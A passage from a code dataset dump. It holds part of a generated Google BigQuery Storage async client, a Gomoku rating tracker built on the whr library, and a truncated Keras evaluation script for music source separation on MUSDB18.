'bigquery_storage_v1beta2.AppendRowsRequest' objects\n # Here we create a generator that yields a single `request` for\n # demonstrative purposes.\n requests = [request]\n\n def request_generator():\n for request in requests:\n yield request\n\n # Make the request\n stream = await client.append_rows(requests=request_generator())\n\n # Handle the response\n async for response in stream:\n print(response)\n\n Args:\n requests (AsyncIterator[`google.cloud.bigquery_storage_v1beta2.types.AppendRowsRequest`]):\n The request object AsyncIterator. Request message for ``AppendRows``.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n AsyncIterable[google.cloud.bigquery_storage_v1beta2.types.AppendRowsResponse]:\n Response message for AppendRows.\n \"\"\"\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.append_rows,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.ResourceExhausted,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=86400.0,\n ),\n default_timeout=86400.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (gapic_v1.routing_header.to_grpc_metadata(()),)\n\n # Send the request.\n response = rpc(\n requests,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def get_write_stream(\n self,\n request: Optional[Union[storage.GetWriteStreamRequest, dict]] = None,\n *,\n name: Optional[str] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> stream.WriteStream:\n r\"\"\"Gets a write stream.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_get_write_stream():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.GetWriteStreamRequest(\n name=\"name_value\",\n )\n\n # Make the request\n response = await client.get_write_stream(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.GetWriteStreamRequest, dict]]):\n The request object. Request message for ``GetWriteStreamRequest``.\n name (:class:`str`):\n Required. Name of the stream to get, in the form of\n ``projects/{project}/datasets/{dataset}/tables/{table}/streams/{stream}``.\n\n This corresponds to the ``name`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.WriteStream:\n Information about a single stream\n that gets data inside the storage\n system.\n\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([name])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.GetWriteStreamRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if name is not None:\n request.name = name\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.get_write_stream,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"name\", request.name),)),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def finalize_write_stream(\n self,\n request: Optional[Union[storage.FinalizeWriteStreamRequest, dict]] = None,\n *,\n name: Optional[str] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> storage.FinalizeWriteStreamResponse:\n r\"\"\"Finalize a write stream so that no new data can be appended to\n the stream. Finalize is not supported on the '_default' stream.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_finalize_write_stream():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.FinalizeWriteStreamRequest(\n name=\"name_value\",\n )\n\n # Make the request\n response = await client.finalize_write_stream(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.FinalizeWriteStreamRequest, dict]]):\n The request object. Request message for invoking ``FinalizeWriteStream``.\n name (:class:`str`):\n Required. Name of the stream to finalize, in the form of\n ``projects/{project}/datasets/{dataset}/tables/{table}/streams/{stream}``.\n\n This corresponds to the ``name`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.FinalizeWriteStreamResponse:\n Response message for FinalizeWriteStream.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([name])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.FinalizeWriteStreamRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if name is not None:\n request.name = name\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.finalize_write_stream,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"name\", request.name),)),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def batch_commit_write_streams(\n self,\n request: Optional[Union[storage.BatchCommitWriteStreamsRequest, dict]] = None,\n *,\n parent: Optional[str] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> storage.BatchCommitWriteStreamsResponse:\n r\"\"\"Atomically commits a group of ``PENDING`` streams that belong to\n the same ``parent`` table. Streams must be finalized before\n commit and cannot be committed multiple times. Once a stream is\n committed, data in the stream becomes available for read\n operations.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_batch_commit_write_streams():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.BatchCommitWriteStreamsRequest(\n parent=\"parent_value\",\n write_streams=['write_streams_value1', 'write_streams_value2'],\n )\n\n # Make the request\n response = await client.batch_commit_write_streams(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.BatchCommitWriteStreamsRequest, dict]]):\n The request object. Request message for ``BatchCommitWriteStreams``.\n parent (:class:`str`):\n Required. Parent table that all the streams should\n belong to, in the form of\n ``projects/{project}/datasets/{dataset}/tables/{table}``.\n\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.BatchCommitWriteStreamsResponse:\n Response message for BatchCommitWriteStreams.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.BatchCommitWriteStreamsRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if parent is not None:\n request.parent = parent\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.batch_commit_write_streams,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def flush_rows(\n self,\n request: Optional[Union[storage.FlushRowsRequest, dict]] = None,\n *,\n write_stream: Optional[str] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> storage.FlushRowsResponse:\n r\"\"\"Flushes rows to a BUFFERED stream. If users are appending rows\n to BUFFERED stream, flush operation is required in order for the\n rows to become available for reading. A Flush operation flushes\n up to any previously flushed offset in a BUFFERED stream, to the\n offset specified in the request. Flush is not supported on the\n \\_default stream, since it is not BUFFERED.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_flush_rows():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.FlushRowsRequest(\n write_stream=\"write_stream_value\",\n )\n\n # Make the request\n response = await client.flush_rows(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.FlushRowsRequest, dict]]):\n The request object. Request message for ``FlushRows``.\n write_stream (:class:`str`):\n Required. The stream that is the\n target of the flush operation.\n\n This corresponds to the ``write_stream`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.FlushRowsResponse:\n Respond message for FlushRows.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([write_stream])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.FlushRowsRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if write_stream is not None:\n request.write_stream = write_stream\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.flush_rows,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(\n ((\"write_stream\", request.write_stream),)\n ),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def __aenter__(self) -> \"BigQueryWriteAsyncClient\":\n return self\n\n async def __aexit__(self, exc_type, exc, tb):\n await self.transport.close()\n\n\nDEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(\n gapic_version=package_version.__version__\n)\n\n\n__all__ = (\"BigQueryWriteAsyncClient\",)\n","sub_path":"google/cloud/bigquery_storage_v1beta2/services/big_query_write/async_client.py","file_name":"async_client.py","file_ext":"py","file_size_in_byte":38876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"418340228","text":"from tabnanny import verbose\nimport whr\n\nclass GomokuTracker():\n def __init__(self, w2, update_model_threshold):\n self.match_result = whr.Base(config={'w2': w2})\n self.current_model = 1\n self.update_model_threshold = update_model_threshold\n\n def init_result_trackers(self, prev_match_results):\n start = 0\n for match in prev_match_results:\n self.current_model = match[0]\n start = match[5]\n for i in range(match[2]):\n self.match_result.create_game('player_'+'{}'.format(match[0]), 'player_'+'{}'.format(match[1]), 'B', match[5])\n for i in range(match[3]):\n self.match_result.create_game('player_'+'{}'.format(match[0]), 'player_'+'{}'.format(match[1]), 'W', match[5])\n for i in range(match[4]):\n self.match_result.create_game('player_'+'{}'.format(match[0]), 'player_'+'{}'.format(match[1]), 'D', match[5])\n if prev_match_results != []:\n fianl_match = prev_match_results[-1]\n if float(fianl_match[2]) / (fianl_match[2] + fianl_match[3]) > self.update_model_threshold:\n self.current_model += 1\n \n return start\n\n def init_league_results(self, num_warmup):\n # whr library does not support the 0th day\n day = max(num_warmup, 1)\n self.match_result.create_game(\"main_ckpt_\"+\"{}\".format(num_warmup), \"main_exploit_ckpt_\"+\"{}\".format(num_warmup), \"D\", day)\n self.match_result.create_game(\"league_exploit_ckpt_\"+\"{}\".format(num_warmup), \"main_exploit_ckpt_\"+\"{}\".format(num_warmup), \"D\", day)\n self.match_result.create_game(\"main_ckpt_\"+\"{}\".format(num_warmup), \"league_exploit_ckpt_\"+\"{}\".format(num_warmup), \"D\", day)\n self.match_result.iterate_until_converge(verbose=False)\n\n \n def update_result_tracker(self, iteration, one_won, two_won, draws):\n for i in range(one_won):\n self.match_result.create_game('player_'+'{}'.format(self.current_model), 'player_'+'{}'.format(self.current_model-1), 'B', iteration)\n for i in range(two_won):\n self.match_result.create_game('player_'+'{}'.format(self.current_model), 'player_'+'{}'.format(self.current_model-1), 'W', iteration) \n for i in range(draws):\n self.match_result.create_game('player_'+'{}'.format(self.current_model), 'player_'+'{}'.format(self.current_model-1), 'D', iteration) \n self.match_result.iterate_until_converge(verbose=False)\n\n if one_won + two_won > 0 and float(one_won) / (one_won + two_won) > self.update_model_threshold:\n self.current_model += 1\n \n return self.match_result.get_ordered_ratings()\n\n def find_opponent_hard(self, itr, id, rival_list):\n # print(itr, id, rival_list)\n prob = [self.calc_beat_rate(itr, id, i) for i in rival_list]\n # print(rival_list, prob)\n hard = [(1-i)**2 for i in prob]\n return rival_list[hard.index(max(hard))]\n \n def find_opponent_rel(self, itr, id, rival_list):\n # print(itr, id, rival_list)\n prob = [self.calc_beat_rate(itr, id, i) for i in rival_list]\n # print(rival_list, prob)\n rel = [(1-i)*i for i in prob]\n return rival_list[rel.index(max(rel))]\n\n def calc_beat_rate(self, itr, player1, player2):\n # print(itr, player1, player2)\n virtual_game = whr.Game(player1, player2, \"B\", itr)\n eval = whr.Evaluate(self.match_result)\n return eval.evaluate_single_game(virtual_game)\n\n def create_game(self, player1, player2, result, timestamp):\n self.match_result.create_game(player1, player2, result, timestamp)\n \n def iterate_until_converge(self, verbose=False):\n self.match_result.iterate_until_converge(verbose=False)\n\n def get_ordered_ratings(self):\n self.match_result.iterate_until_converge(verbose=False)\n return self.match_result.get_ordered_ratings()","sub_path":"src/gomoku_rating_utils.py","file_name":"gomoku_rating_utils.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"79058657","text":"# JACSNET Evaluation\n# Author: Vanessa H. Tan 04.11.19\n\n# get libraries\nimport sys\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport csv\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport itertools\n\nimport librosa\nimport librosa.display\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import *\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\nfrom keras import optimizers\nimport keras.backend as K\n\nimport museval\nimport musdb\nimport norbert\n\nfrom sklearn.metrics import confusion_matrix, multilabel_confusion_matrix, roc_auc_score, accuracy_score, roc_curve, precision_recall_curve, f1_score, auc, average_precision_score\nfrom scipy.optimize import brentq\nfrom scipy.interpolate import interp1d\n\nfrom model import UNETmodule, RECOVmodule\nfrom utils import checkNoise\n\ndef custom_loss_wrapper_a(mask):\n def custom_loss_a(y_true, y_pred):\n mae = K.mean(K.abs(np.multiply(mask, y_pred) - y_true), axis=-1)\n\n y_true = K.clip(y_true, K.epsilon(), 1)\n y_pred = K.clip(np.multiply(mask, y_pred), K.epsilon(), 1)\n KL = K.sum(y_true * K.log(y_true / y_pred), axis=-1)\n\n return mae + (0.5*KL)\n return custom_loss_a\n\ndef binary_focal_loss(gamma=2., alpha=.25):\n \"\"\"\n Binary form of focal loss.\n FL(p_t) = -alpha * (1 - p_t)**gamma * log(p_t)\n where p = sigmoid(x), p_t = p or 1 - p depending on if the label is 1 or 0, respectively.\n References:\n https://arxiv.org/pdf/1708.02002.pdf\n Usage:\n model.compile(loss=[binary_focal_loss(alpha=.25, gamma=2)], metrics=[\"accuracy\"], optimizer=adam)\n \"\"\"\n def binary_focal_loss_fixed(y_true, y_pred):\n \"\"\"\n :param y_true: A tensor of the same shape as `y_pred`\n :param y_pred: A tensor resulting from a sigmoid\n :return: Output tensor.\n \"\"\"\n pt_1 = tf.where(tf.equal(y_true, 1), y_pred, tf.ones_like(y_pred))\n pt_0 = tf.where(tf.equal(y_true, 0), y_pred, tf.zeros_like(y_pred))\n\n epsilon = K.epsilon()\n # clip to prevent NaN's and Inf's\n pt_1 = K.clip(pt_1, epsilon, 1. - epsilon)\n pt_0 = K.clip(pt_0, epsilon, 1. - epsilon)\n\n return -K.sum(alpha * K.pow(1. - pt_1, gamma) * K.log(pt_1)) \\\n -K.sum((1 - alpha) * K.pow(pt_0, gamma) * K.log(1. - pt_0))\n\n return binary_focal_loss_fixed\n\ndef mulphase(inp, phase):\n voc_spec = np.abs(inp)\n voc_spec = np.multiply(voc_spec, phase)\n return voc_spec\n\ndef roc_auc_score_FIXED(y_true, y_pred):\n if len(np.unique(y_true)) == 1: # bug in roc_auc_score\n return accuracy_score(y_true, np.rint(y_pred))\n return roc_auc_score(y_true, y_pred)\n\ndef eval_metrics(y_true, y_pred):\n fpr, tpr, threshold = roc_curve(y_true, y_pred, pos_label=1)\n eer = brentq(lambda x : 1. - x - interp1d(fpr, tpr)(x), 0., 1.)\n auc_res = roc_auc_score_FIXED(y_true, y_pred)\n return auc_res, eer\n\ndef plot_confusion_matrix(cm, classes, title, ax):\n\n ax.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n ax.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > cm.max() / 2. else \"black\")\n\n tick_marks = np.arange(len(classes))\n ax.set_xticks(tick_marks), ax.xaxis.set_ticklabels(classes)\n ax.set_yticks(tick_marks), ax.yaxis.set_ticklabels(classes)\n ax.set_xlabel('Predicted')\n ax.set_ylabel('Truth')\n ax.set_title(title)\n ax.grid(False)\n\ndef plot_multiclass_confusion_matrix(y_true, y_pred, label_to_class, save_plot=False):\n fig, axes = plt.subplots(int(np.ceil(len(label_to_class) / 2)), 2, figsize=(5, 5))\n axes = axes.flatten()\n for i, conf_matrix in enumerate(multilabel_confusion_matrix(y_true, y_pred)):\n tn, fp, fn, tp = conf_matrix.ravel()\n f1 = 2 * tp / (2 * tp + fp + fn + sys.float_info.epsilon)\n recall = tp / (tp + fn + sys.float_info.epsilon)\n precision = tp / (tp + fp + sys.float_info.epsilon)\n plot_confusion_matrix(\n np.array([[tp, fn], [fp, tn]]),\n classes=['+', '-'],\n title=f'Label: {label_to_class[i]}\\nf1={f1:.5f}\\nrecall={recall:.5f}\\nprecision={precision:.5f}',\n ax=axes[i]\n )\n plt.tight_layout()\n plt.show()\n if save_plot:\n plt.savefig('confusion_matrices.png', dpi=50)\n\ndef main(args):\n\n # Parameters\n seed = 3\n num_classes = 4\n num_epochs = 100\n drop_prob = 0\n learning_rate = 1e-4\n window_size = 2048\n hop_size = 512\n window = np.blackman(window_size)\n\n # Model Architecture\n inputs = Input(shape=[1025, 94, 1])\n\n recov_input = UNETmodule(inputs, 1, drop_prob)\n recov_input = LeakyReLU(alpha=0.2, name='recov_input')(recov_input)\n\n UNET = UNETmodule(recov_input, num_classes, drop_prob)\n sep_sources = Activation('softmax', name='sep_sources')(UNET)\n\n sourceclass = GlobalAveragePooling2D()(UNET)\n sourceclass = Dense(128, activation='relu')(sourceclass)\n sourceclass = Dense(128, activation='relu')(sourceclass)\n sourceclass = Dense(128, activation='relu')(sourceclass)\n sourceclass = Dense(num_classes)(sourceclass)\n sourceclass = Activation('sigmoid', name='sourceclass')(sourceclass)\n\n # Train Model Architecture\n loss_funcs = {\n \"sep_sources\": custom_loss_wrapper_a(mask = inputs),\n \"sourceclass\": binary_focal_loss(),\n \"recov_input\": \"binary_crossentropy\"\n }\n lossWeights = {\"sep_sources\": 10, \"sourceclass\": 0.01, \"recov_input\": 0.5}\n optimizer = optimizers.Adam(lr=learning_rate)\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', patience=5)\n model = Model(inputs=inputs, outputs=[sep_sources, sourceclass, recov_input])\n model.compile(loss=loss_funcs, optimizer=optimizer, loss_weights=lossWeights)\n\n # Load Model\n model.load_weights(\"model_weights.hdf5\")\n\n # initiate musdb\n mus = musdb.DB(root_dir=\"D:/Data/Musdb18\")\n\n # load the testing tracks\n tracks = mus.load_mus_tracks(subsets=['test'])\n\n SDR_results = []\n SIR_results = []\n ISR_results = []\n SAR_results = []\n\n classresults = []\n classresults_hat = []\n labelresults = []\n\n duration = 3\n for track in tracks:\n print(track.name)\n\n audio, sr = librosa.load(str('D:/Data/Musdb18/mixturev2/test/' + track.name + '.wav'))\n # audio = librosa.util.normalize(audio, norm=np.inf, axis=None)\n dur = librosa.get_duration(y=audio, sr=sr)\n\n for i in range(0, int(dur - duration), duration):\n labelclass = [0, 0, 0, 0]\n\n # STFT Mixture\n mixture, sr = librosa.load(str('D:/Data/Musdb18/mixturev2/test/' + track.name + '.wav'), offset=i, duration=duration, mono=True, sr=16000)\n orig = librosa.core.stft(mixture, hop_length=hop_size, n_fft=window_size, window=window)\n magnitude, phase = librosa.magphase(orig)\n orig_norm = 2 * magnitude / np.sum(window)\n\n X = np.reshape(orig_norm, (1, 1025, 94, 1))\n X = X.astype('float32')\n\n (sources, sourceclass, inp) = model.predict(X, batch_size=1)\n classresults.append(sourceclass)\n sourceclass_hat = np.around(sourceclass, decimals = 1)\n sourceclass_hat[sourceclass_hat <= 0.5] = 0\n sourceclass_hat[sourceclass_hat > 0.5] = 1\n classresults_hat.append(sourceclass_hat)\n\n sources_reshape = np.reshape(sources, (1025, 94, 1, 4))\n orig_reshape = np.reshape(orig, (1025, 94, 1))\n source_spec = norbert.wiener(sources_reshape, orig_reshape, use_softmask=True)\n\n inp_reshape = np.reshape(inp, (1025, 94, 1, 1))\n inp = norbert.wiener(inp_reshape, orig_reshape, use_softmask=False)\n inp_spec = np.reshape(inp, (1025, 94))\n #inp_spec = mulphase(target_pred_mag_inp, phase)\n\n voc_spec = np.reshape(source_spec[:,:,:,0], (1025, 94))\n bas_spec = np.reshape(source_spec[:,:,:,1], (1025, 94))\n dru_spec = np.reshape(source_spec[:,:,:,2], (1025, 94))\n oth_spec = np.reshape(source_spec[:,:,:,3], (1025, 94))\n\n # Get ground truth\n gt_voc, sr = librosa.load(str('D:/Data/Musdb18/groundtruth/test/' + track.name + '/vocals.wav'), offset=i, duration=3, mono=True, sr=16000)\n if ((checkNoise(gt_voc) > 0.05)): labelclass[0] = 1\n # gt_voc_down = scipy.signal.decimate(gt_voc, 2)\n gt_voc_final = np.reshape(gt_voc, (1, gt_voc.shape[0], 1))\n\n gt_bas, sr = librosa.load(str('D:/Data/Musdb18/groundtruth/test/' + track.name + '/bass.wav'), offset=i, duration=3, mono=True, sr=16000)\n if ((checkNoise(gt_bas) > 0.05)): labelclass[1] = 1\n # gt_bas_down = scipy.signal.decimate(gt_bas, 2)\n gt_bas_final = np.reshape(gt_bas, (1, gt_bas.shape[0], 1))\n\n gt_dru, sr = librosa.load(str('D:/Data/Musdb18/groundtruth/test/' + track.name + '/drums.wav'), offset=i, duration=3, mono=True, sr=16000)\n if ((checkNoise(gt_dru) > 0.05)): labelclass[2] = 1\n # gt_dru_down = scipy.signal.decimate(gt_dru, 2)\n gt_dru_final = np.reshape(gt_dru, (1, gt_dru.shape[0], 1))\n\n gt_others, sr = librosa.load(str('D:/Data/Musdb18/groundtruth/test/' + track.name + '/other.wav'), offset=i, duration=3, mono=True, sr=16000)\n if ((checkNoise(gt_others) > 0.05)): labelclass[3] = 1\n # gt_others_down = scipy.signal.decimate(gt_others, 2)\n gt_others_final = np.reshape(gt_others, (1, gt_others.shape[0], 1))\n\n gt_inp_final = np.reshape(mixture, (1, mixture.shape[0], 1))\n\n labelresults.append(labelclass)\n\n # Get predictions\n vocals = librosa.core.istft(voc_spec, hop_length=hop_size, length=gt_voc_final.shape[1], window=window, win_length=window_size)\n # vocals = scipy.signal.wiener(vocals)\n vocals = np.reshape(vocals, (1, vocals.shape[0], 1))\n\n bass = librosa.core.istft(bas_spec, hop_length=hop_size, length=gt_bas_final.shape[1], window=window, win_length=window_size)\n # bass = scipy.signal.wiener(bass)\n bass = np.reshape(bass, (1, bass.shape[0], 1))\n\n drums = librosa.core.istft(dru_spec, hop_length=hop_size, length=gt_dru_final.shape[1], window=window, win_length=window_size)\n # drums = scipy.signal.wiener(drums)\n drums = np.reshape(drums, (1, drums.shape[0], 1))\n\n others = librosa.core.istft(oth_spec, hop_length=hop_size, length=gt_others_final.shape[1], window=window, win_length=window_size)\n # others = scipy.signal.wiener(others)\n others = np.reshape(others, (1, others.shape[0], 1))\n\n # if(sourceclass[0][0] <= 0.5):\n # vocals = np.zeros((gt_voc_final.shape[1], 1))\n # # vocals.fill(0.04)\n # vocals = np.reshape(vocals, (1, vocals.shape[0], 1))\n # else:\n # vocals = librosa.core.istft(voc_spec, hop_length=hop_size, length=gt_voc_final.shape[1], window=window)\n # # vocals = scipy.signal.wiener(vocals)\n # vocals = np.reshape(vocals, (1, vocals.shape[0], 1))\n #\n # if(sourceclass[0][1] <= 0.5):\n # bass = np.zeros((gt_bas_final.shape[1], 1))\n # # bass.fill(0.04)\n # bass = np.reshape(bass, (1, bass.shape[0], 1))\n # else:\n # bass = librosa.core.istft(bas_spec, hop_length=hop_size, length=gt_bas_final.shape[1], window=window)\n # # bass = scipy.signal.wiener(bass)\n # bass = np.reshape(bass, (1, bass.shape[0], 1))\n #\n # if(sourceclass[0][2] <= 0.5):\n # drums = np.zeros((gt_dru_final.shape[1], 1))\n # # drums.fill(0.04)\n # drums = np.reshape(drums, (1, drums.shape[0], 1))\n # else:\n # drums = librosa.core.istft(dru_spec, hop_length=hop_size, length=gt_dru_final.shape[1], window=window)\n # # drums = scipy.signal.wiener(drums)\n # drums = np.reshape(drums, (1, drums.shape[0], 1))\n #\n # if(sourceclass[0][3] <= 0.5):\n # others = np.zeros((gt_others_final.shape[1], 1))\n # # others.fill(0.04)\n # others = np.reshape(others, (1, others.shape[0], 1))\n # else:\n # others = librosa.core.istft(oth_spec, hop_length=hop_size, length=gt_others_final.shape[1], window=window)\n # # others = scipy.signal.wiener(others)\n # others = np.reshape(others, (1, others.shape[0], 1))\n\n recov = librosa.core.istft(inp_spec, hop_length=hop_size, length=gt_inp_final.shape[1], 